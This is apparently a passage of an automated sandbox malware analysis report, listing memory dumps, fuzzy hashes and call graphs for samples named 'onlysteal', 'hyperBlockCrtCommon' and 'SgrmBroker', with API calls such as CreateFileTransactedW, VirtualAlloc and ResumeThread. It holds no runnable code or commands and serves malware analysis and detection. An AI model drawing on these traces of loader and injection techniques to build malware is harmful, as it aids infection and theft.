                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: FindHandleModuleResource
                                      • String ID: RTL
                                      • API String ID: 3537982541-834975271
                                      • Opcode ID: 986eccf80f041e98cc80827a537650d7c7325396f6669f189bbeb81ebad68a67
                                      • Instruction ID: 9a56b3539bfeeab4f384df16799d702faf4da8d8923543ea8ce5d81c5b2f7b2e
                                      • Opcode Fuzzy Hash: 986eccf80f041e98cc80827a537650d7c7325396f6669f189bbeb81ebad68a67
                                      • Instruction Fuzzy Hash: 8FC0123125071166EE30ABB47C0DB836A585B01B15F0A0448F681EA2D1DAF5C98886A0
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E467
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: p$$z$
                                      • API String ID: 1269201914-2964916095
                                      • Opcode ID: 9a0df8e37e587c7b31d8bd032196d123de775421c6d216bde2473f0846e94490
                                      • Instruction ID: ce50be89b3c91dddb5eb037f994cb3ec3ddef9766cbcbfdd11b8ed64245ce127
                                      • Opcode Fuzzy Hash: 9a0df8e37e587c7b31d8bd032196d123de775421c6d216bde2473f0846e94490
                                      • Instruction Fuzzy Hash: 5FB012C527D040BC3F0CF1145C02C37020DD0C1B50331802EF905C0081D8808C700A32
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E467
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: U$$z$
                                      • API String ID: 1269201914-1198662890
                                      • Opcode ID: 72cc666b10e239dc63a778c393f583860170528c81109590f19de98efeb4ba7b
                                      • Instruction ID: 3d5daa3737a4cdecd29528c2ee3ccb69b7ac5881c061e6583dc41aede88c5061
                                      • Opcode Fuzzy Hash: 72cc666b10e239dc63a778c393f583860170528c81109590f19de98efeb4ba7b
                                      • Instruction Fuzzy Hash: 6BB012D12780007C3F0C71105D06C37030DD0C1F20331C02EF705C0095E8844E710932

                                      Execution Graph

                                      Execution Coverage: 17.9%
                                      Dynamic/Decrypted Code Coverage: 100%
                                      Signature Coverage: 0%
                                      Total number of Nodes: 42
                                      Total number of Limit Nodes: 2
                                      [Execution graph: rendered figure, node list not reproduced. API calls present in the graph: VirtualAlloc, WriteFile, CreateFileTransactedW, ResumeThread, GetSystemInfo, QueryFullProcessImageNameA.]
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2168505127.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34a60000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4fca811ec10680fd4f85f3fc4afb3184a6d1d3c4df538d934fb0d6f46ceafc1d
                                      • Instruction ID: f72acd649e12574bae4126261c406fe867477282f668296d9ab4c29e0b4b44e3
                                      • Opcode Fuzzy Hash: 4fca811ec10680fd4f85f3fc4afb3184a6d1d3c4df538d934fb0d6f46ceafc1d
                                      • Instruction Fuzzy Hash: 0D814670D0965D8FDB58DFA8D4A46EDBBB1FF5A315F20006AD009E7292CB39A981CB44

                                      Control-flow Graph

                                      [Control-flow graph: rendered figure with Executed / Not Executed legend, node list not reproduced. Basic blocks span 7ffd34a61ca5-7ffd34a62008 and call QueryFullProcessImageNameA.]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2168505127.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34a60000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: FullImageNameProcessQuery
                                      • String ID:
                                      • API String ID: 3578328331-0
                                      • Opcode ID: 4817b2cbe411f3c062aa7e3afb80cf5ce5d9d7fe12479177fcfb84f4e9ecd967
                                      • Instruction ID: f05558e4167561619f3f8d88496163fafdd7a0bc2f541b6d147cb15881b1606e
                                      • Opcode Fuzzy Hash: 4817b2cbe411f3c062aa7e3afb80cf5ce5d9d7fe12479177fcfb84f4e9ecd967
                                      • Instruction Fuzzy Hash: EBB16E30618A8D8FEB78DF58C895BE93BE1FB59315F10412ED84ECB291DB78A541CB81

                                      Control-flow Graph

                                      [Control-flow graph: rendered figure with Executed / Not Executed legend, node list not reproduced. Basic blocks span 7ffd3488b98a-7ffd3488bc30 and call CreateFileTransactedW.]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: f4e79f3177222fccd44190b5c0f2e4ba5f8f488ba2e1ed0a09c3b1a6190f133c
                                      • Instruction ID: 813d8ab907da37a07c6e329b5fec4e9d7b4fdafc39d111c252d3ccd163db7465
                                      • Opcode Fuzzy Hash: f4e79f3177222fccd44190b5c0f2e4ba5f8f488ba2e1ed0a09c3b1a6190f133c
                                      • Instruction Fuzzy Hash: BB912170908A5C8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A984CB04

                                      Control-flow Graph

                                      [Control-flow graph: rendered figure with Executed / Not Executed legend, node list not reproduced. Basic blocks span 7ffd34889fb0-7ffd3488bc30 and call CreateFileTransactedW.]
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d428cf0e2c73eb307b588248a72f2ade4eac3da92bc960b21c8380fedabcc6a
                                      • Instruction ID: 60196e2f183b32d6836341e85aeaae3c3b717f4461ad30c97494a970ff0d84da
                                      • Opcode Fuzzy Hash: 4d428cf0e2c73eb307b588248a72f2ade4eac3da92bc960b21c8380fedabcc6a
                                      • Instruction Fuzzy Hash: 5B81E170A08A1C8FDB98DF58C895BA9BBF1FB69301F1051AED04EE3251DB75A980CF44

                                      Control-flow Graph

                                      [Control-flow graph: rendered figure with Executed / Not Executed legend, node list not reproduced. Basic blocks span 7ffd3488bc35-7ffd3488be31 and call WriteFile.]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 2b796fcee90945651850a8139051d948994ed8ee21f2eda2b368f331d7b698af
                                      • Instruction ID: adad1e52ae0ab5c6aea8ca26265b1e360f8461a3d82042cd26b639f9a33e627a
                                      • Opcode Fuzzy Hash: 2b796fcee90945651850a8139051d948994ed8ee21f2eda2b368f331d7b698af
                                      • Instruction Fuzzy Hash: 9C610570A08A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A985CB40

                                      Control-flow Graph

                                      [Control-flow graph: rendered figure with Executed / Not Executed legend, node list not reproduced. Basic blocks span 7ffd3488d59a-7ffd3488d6fb and call GetSystemInfo.]
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 7a9d59a6c6bc1980032eeb7a770f8886b76c08dde5e061622d40717325f8bf2c
                                      • Instruction ID: 3a8c00cc551434ee7ea2697f90f1849f111b4b0cb6b588bdf9a18881ec22174b
                                      • Opcode Fuzzy Hash: 7a9d59a6c6bc1980032eeb7a770f8886b76c08dde5e061622d40717325f8bf2c
                                      • Instruction Fuzzy Hash: A0416D71A08A4C8FDB98EF98D899AE9BBF4FF56315F04416BD00DD7252DA34A846CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 031f6cedd1267a83834393632ee35f72e5853ea535befedbc6b3af5d10198294
                                      • Instruction ID: 14220feb427ef7a1a7f19a91f90cda1b57f29d416f928e1cffeb40248e1184ce
                                      • Opcode Fuzzy Hash: 031f6cedd1267a83834393632ee35f72e5853ea535befedbc6b3af5d10198294
                                      • Instruction Fuzzy Hash: BA412974A0860C8FDB58EF98D895AEDBBF0FB5A310F10416AD40DE7252DA75A886CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 54896601cd8be56374f804f6b69519bbb9194d8da8be59a49fce94f9804dc4bb
                                      • Instruction ID: 68eda044602692d166e2e495dc21f62ec763f5d574ff45731d11f92e16dc1b04
                                      • Opcode Fuzzy Hash: 54896601cd8be56374f804f6b69519bbb9194d8da8be59a49fce94f9804dc4bb
                                      • Instruction Fuzzy Hash: 7041A17090C68C8FDB99DFA8D899BE9BBF0EF56320F0441ABD04DD7252CA355846CB40
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 15c0d049ffabedaf16b559d531226590d8eb316f06f9b5cfb7a83416ad4298c1
                                      • Instruction ID: bdffa20a112ebe3b7560b6fb50b9630d60c15079ef0f6f0c5d8745e7039d102f
                                      • Opcode Fuzzy Hash: 15c0d049ffabedaf16b559d531226590d8eb316f06f9b5cfb7a83416ad4298c1
                                      • Instruction Fuzzy Hash: DC512A70908A5C8FDF98DF58C895BE9BBF0FB6A314F1042AAD04DE3251DB74A985CB41
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2167711736.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffd34880000_hyperBlockCrtCommon.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4101fa39b07874b1962ef2c314eff0adce44a9e40a0327023346383be5e2be73
                                      • Instruction ID: 2d56f1e25ac7699b160f0f781b0052aca7ddbf81868ac2b0a06f82238fc57d0a
                                      • Opcode Fuzzy Hash: 4101fa39b07874b1962ef2c314eff0adce44a9e40a0327023346383be5e2be73
                                      • Instruction Fuzzy Hash: CE818370A08A8D8FEBA8DF18C8557F97BE1FF5A311F10412AE84DC7291DB74A945CB81

                                      Execution Graph

                                      Execution Coverage: 14.2%
                                      Dynamic/Decrypted Code Coverage: 100%
                                      Signature Coverage: 0%
                                      Total number of Nodes: 25
                                      Total number of Limit Nodes: 1
                                      [Execution graph: rendered figure, node list not reproduced. API calls present in the graph: CreateFileTransactedW, VirtualAlloc, WriteFile, ResumeThread, GetSystemInfo.]
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: af6b64b0d1db71fcd8d030eb44bca043d659b66effc945140228c974dc6ad3e6
                                      • Instruction ID: b24cdc89c3612b2eb9c85a9e7a1f50edf03b05ba63ce235c5f677c6c86742919
                                      • Opcode Fuzzy Hash: af6b64b0d1db71fcd8d030eb44bca043d659b66effc945140228c974dc6ad3e6
                                      • Instruction Fuzzy Hash: 0C723C70E09A1D8FEBE4EF18C8A56A977B1FF59305F1001B9D50DE3291DE786A819F40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph
                                       1770 7ffd348ab98a-7ffd348ab997
                                       1771 7ffd348ab999-7ffd348ab9a1
                                       1770->1771
                                       1772 7ffd348ab9a2-7ffd348aba68
                                       1770->1772
                                       1771->1772
                                       1775 7ffd348aba6a-7ffd348aba81
                                       1772->1775
                                       1776 7ffd348aba84-7ffd348abba6 CreateFileTransactedW
                                       1772->1776
                                       1775->1776
                                       1777 7ffd348abba8
                                       1776->1777
                                       1778 7ffd348abbae-7ffd348abc30
                                       1776->1778
                                       1777->1778
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: 00577af65a166b54f819bc79fdcdfbcb7345f317fe7c833b6fce971f25fde15a
                                      • Instruction ID: 74619530a7c2c77baf346bf19cd7d8aca72e934441990cc99fe3d342618ffb43
                                      • Opcode Fuzzy Hash: 00577af65a166b54f819bc79fdcdfbcb7345f317fe7c833b6fce971f25fde15a
                                      • Instruction Fuzzy Hash: 32912070908A5C8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A984CB04

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph
                                       1781 7ffd348a9fb0-7ffd348aba68
                                       1786 7ffd348aba6a-7ffd348aba81
                                       1781->1786
                                       1787 7ffd348aba84-7ffd348abba6 CreateFileTransactedW
                                       1781->1787
                                       1786->1787
                                       1788 7ffd348abba8
                                       1787->1788
                                       1789 7ffd348abbae-7ffd348abc30
                                       1787->1789
                                       1788->1789
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f677c4301ed21c578fa83f09c8344a1fdde67973c2b1906e6221d610d39472f0
                                      • Instruction ID: 3d345864311e469bb3a186a2cef8fe935434d7d15eea2b021b3afdb1c8a68adc
                                      • Opcode Fuzzy Hash: f677c4301ed21c578fa83f09c8344a1fdde67973c2b1906e6221d610d39472f0
                                      • Instruction Fuzzy Hash: 6E81E070A08A1C8FDB98DF58C894BA9BBF1FB69310F1051AED04EE3251DB75A981CF44

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph
                                       1792 7ffd348abc35-7ffd348abd02
                                       1796 7ffd348abd2a-7ffd348abdcd WriteFile
                                       1792->1796
                                       1797 7ffd348abd04-7ffd348abd27
                                       1792->1797
                                       1798 7ffd348abdd5-7ffd348abe31
                                       1796->1798
                                       1799 7ffd348abdcf
                                       1796->1799
                                       1797->1796
                                       1799->1798
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 5ae0bbb22588e0bf56d446800c07ad0bb0ae1c2c4b2ec7a4c1364a37b1addb0d
                                      • Instruction ID: 7b2374de3cb0807b0a22fb41ca520c31a8c80c756a8921a13222130f296e9567
                                      • Opcode Fuzzy Hash: 5ae0bbb22588e0bf56d446800c07ad0bb0ae1c2c4b2ec7a4c1364a37b1addb0d
                                      • Instruction Fuzzy Hash: 22610570A08A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A985CB40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph
                                       1801 7ffd348ad59a-7ffd348ad5a3
                                       1802 7ffd348ad5a5-7ffd348ad5cf
                                       1801->1802
                                       1803 7ffd348ad5ed
                                       1801->1803
                                       1805 7ffd348ad5ef
                                       1803->1805
                                       1806 7ffd348ad5f0-7ffd348ad65a
                                       1803->1806
                                       1805->1806
                                       1809 7ffd348ad662-7ffd348ad6c3 GetSystemInfo
                                       1806->1809
                                       1810 7ffd348ad6c5
                                       1809->1810
                                       1811 7ffd348ad6cb-7ffd348ad6fb
                                       1809->1811
                                       1810->1811
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 1acb3c4a30810f1daaa07c613428d139de7c119284ea86cdd6cfef25a537397d
                                      • Instruction ID: 9edeabf94d86052a0aa14bc56760972846c6e52ec93e2fb9cc9b62ab831846a7
                                      • Opcode Fuzzy Hash: 1acb3c4a30810f1daaa07c613428d139de7c119284ea86cdd6cfef25a537397d
                                      • Instruction Fuzzy Hash: 1A41C071A08A4C8FDB98EF98D898BEDBBF1FF56314F04416AD00DD7252DA74A846CB50

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph
                                       1814 7ffd3490f1d7-7ffd3490f1e0
                                       1815 7ffd3490f1e2-7ffd3490f202
                                       1814->1815
                                       1816 7ffd3490f22a-7ffd3490f2f2 ResumeThread
                                       1814->1816
                                       1820 7ffd3490f2f4
                                       1816->1820
                                       1821 7ffd3490f2fa-7ffd3490f344
                                       1816->1821
                                       1820->1821
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 69a3f8db2f494b2d6160ba5e5318e3f0f2d69d37ec0b5858291707da76db5c18
                                      • Instruction ID: ca4ac02666fd40f5b6d83ebadaa2d4a5d7757c39e6ac1e9ec04e8fcc314461d3
                                      • Opcode Fuzzy Hash: 69a3f8db2f494b2d6160ba5e5318e3f0f2d69d37ec0b5858291707da76db5c18
                                      • Instruction Fuzzy Hash: AE413974E0860C8FDB58EF98D894AEDBBF0FB5A310F10416ED40DE7251DA75A946CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 835a68cf31ac7013327ebd1b1f92e15ccb0e7ac9e9efe2afbe58ec6921c436f0
                                      • Instruction ID: f16bbd0a1ee37553df192973465b19abed690495b32c41248267de34a1034fe0
                                      • Opcode Fuzzy Hash: 835a68cf31ac7013327ebd1b1f92e15ccb0e7ac9e9efe2afbe58ec6921c436f0
                                      • Instruction Fuzzy Hash: 4141A27090C68C8FDB99DFA8D859BE9BBF1EF56310F0441ABD04DD7252CA745846CB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 756aac56db2800ebd372e364dcf1d3e4bfb65fef0c062d0fee99254660074583
                                      • Instruction ID: 942f0de77e0a5888aae61e11d56e0cbc1609f8b74af386b59b1a3b0043f05bdd
                                      • Opcode Fuzzy Hash: 756aac56db2800ebd372e364dcf1d3e4bfb65fef0c062d0fee99254660074583
                                      • Instruction Fuzzy Hash: 92512A70908A5C8FDF98DF58C895BE9BBF1FB6A314F1042AAD04DE3251DB70A985CB41
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b3cd0ecdad55802421014f04c06d865345217151851feb6063904d031bb9429
                                      • Instruction ID: ba69cc8cbb032e229913bc9b71cf51efeced0e5a094e62fc85dba6b92a7935c8
                                      • Opcode Fuzzy Hash: 4b3cd0ecdad55802421014f04c06d865345217151851feb6063904d031bb9429
                                      • Instruction Fuzzy Hash: 4771B171E0D64D8FEB94DBA8D8A46BC7BF1FF56301F1400BAD409D7292CA79A841DB40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565dc3755473e43ec7ac9f0ca0589c522366034b0ea65aee52c37db3846bcfdf
                                      • Instruction ID: 8a9f4e70c777269428b9ed41fe19ac292efda22d20072cd4992e05664e52adf3
                                      • Opcode Fuzzy Hash: 565dc3755473e43ec7ac9f0ca0589c522366034b0ea65aee52c37db3846bcfdf
                                      • Instruction Fuzzy Hash: 6312B670A1865D8FEB94EF68C8A56EDBBF1FF59304F10017AD40DE3292CA79A945CB40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 576030a31099b474aed62b3218619556dfe9f2bbe64ada234c2e3b484a38b35c
                                      • Instruction ID: 62da93464db2cae52b3d6ec752b14d41920f46a9fe95bac2a44abe820ccf308d
                                      • Opcode Fuzzy Hash: 576030a31099b474aed62b3218619556dfe9f2bbe64ada234c2e3b484a38b35c
                                      • Instruction Fuzzy Hash: C9F1D571A1865D8FEB94EF68C8A56FDBBF1FF59304F10017AD409D3292CA39A945CB80
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e653f4a4dc5d53e5e55ac44cf22853233f5b689713174f2e6f5133a8c42eafaa
                                      • Instruction ID: 083969e410785f719d0e192b4e2aba1d9e1efd0c5391db499830fdc5a6115e0b
                                      • Opcode Fuzzy Hash: e653f4a4dc5d53e5e55ac44cf22853233f5b689713174f2e6f5133a8c42eafaa
                                      • Instruction Fuzzy Hash: 50F1D671A1865D8FEB94EF68C8A56EDBBF1FF59304F10017AD40DE3292CA79A941CB40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da10127fc545f889c7e89b31983400f6da40004a929c356d6ab68cb0cdeef8ad
                                      • Instruction ID: 135cbc2c00e8a8901937738f949a9a893bf75340bfc33c9c79641649135bc981
                                      • Opcode Fuzzy Hash: da10127fc545f889c7e89b31983400f6da40004a929c356d6ab68cb0cdeef8ad
                                      • Instruction Fuzzy Hash: E6F1C570A1865D8FEB94EF68C8A56EDBBF1FF59300F14017AD409D3292CA796941CB40
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 815feba3a139811951d737ee10c693ab30c0447d3fe71bd8da487f64e4433f6c
                                      • Instruction ID: 2db62aa267cd488c97eea9bd86140ce155906ac715a39e9691fc69f978a638c9
                                      • Opcode Fuzzy Hash: 815feba3a139811951d737ee10c693ab30c0447d3fe71bd8da487f64e4433f6c
                                      • Instruction Fuzzy Hash: 25C1A370A1865D8FEB94EFA8C4A57EDBBB1FF59300F10057AD40DE3292CA79A841CB40
                                      Memory Dump Source
